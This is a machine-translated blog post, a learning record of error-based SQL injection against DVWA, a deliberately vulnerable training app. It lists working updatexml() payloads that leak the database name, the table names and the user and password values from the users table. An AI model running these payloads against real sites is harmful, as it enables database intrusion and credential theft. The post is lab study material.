当前位置:网站首页>DVWA [SQL injection] error injection learning record
DVWA [SQL injection] error injection learning record
2022-07-21 20:49:00 【narukuuuu】
Or to sql-injection For example
Burst a library :
Enter the query statement :
1‘ and updataxml(1,concat(0x7e,database()),1)-- -
Get the database name dvwa
Pop a table name :
-1' and updatexml(1, concat( 0x7e, ( select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),0x7e),1)-- -
-1' and updatexml(1, concat( 0x7e,(select table_name from information_schema.tables where table_schema='dvwa' limit 1,1),0x7e),1)-- -
Next, it will explode users Inside the watch user and password Field . In the use of updatexml() There is something to pay attention to when using this function , Specific reference : Portal
Enter the query statement :
-1' and updatexml(1,concat(0x7e,substr((select concat(user,'|',password) from dvwa.users limit 0,1),1,31),0x7e),1)-- -
because updatexml Only support 32 I'm sorry , So it's best to use... Line by line concat limit And substr Blasting one by one , Just adjust the parameters
Unite the front , You can get user and password
边栏推荐
- Invalid mouse disabled style (cursor: not allowed) conflicts with mouse disabled events (pointer events: none)
- Oh my Zsh efficiency plug-in
- Nodejs+Express使用 cors 中间件解决跨域问题
- Nodejs uses the post method to receive JS objects and write JSON files
- thinkphp设置单位时间内限制 ip 的请求
- Recommend a useful WYSIWYG markdown editor mark text
- 使用Curl 实现 本地 以及远程设备的请求
- Optimization of image multi picture pages
- Precision problems and solutions of JS decimal conversion percentage
- Boundary layer integral equation and Marangoni effect
猜你喜欢
XML parsing
Storage principle of JS data type in memory
TP5对接免签FM支付接口
thinkphp5.1 利用 PHPMailer 发送邮件
计算传热学基础
The C language header stdio cannot be found after Xcode upgrade H solution
VOF phase transition equation in openfoam
Recommander un éditeur de markdown facile à utiliser Mark Text
BUUCTF(misc)
Add, delete, modify and check~
随机推荐
PHP 大文件分块上传 底层实现
php截取得到指定字符串之前与之前后的内容
ThinkPHP6 学习心得
用大白话让你理解TypeScript的要点.(三)
Nodejs uses the post method to receive JS objects and write JSON files
通过Web代理服务器实现文本文件传输至外部服务器并且修改后返回
JS uses recursion to implement deep copy of objects
24. [judge whether it is an integer with bytes]
Nodejs读取并解析xml的DOM
Invalid mouse disabled style (cursor: not allowed) conflicts with mouse disabled events (pointer events: none)
Fundamentals of computational heat transfer
BUUCTF [SUCTF 2019]EasySQL
第二届网刃杯web题复现
DVWA[SQL-Injection(Blind)]学习记录
Mysql 主从复制
XML modeling
Oh my Zsh efficiency plug-in
uniapp 下拉刷新、上拉加载更多、最常见的节流场景
First Working Day~
Why use the fast and slow pointer to find the link of the linked list, and the fast pointer and the slow pointer must meet?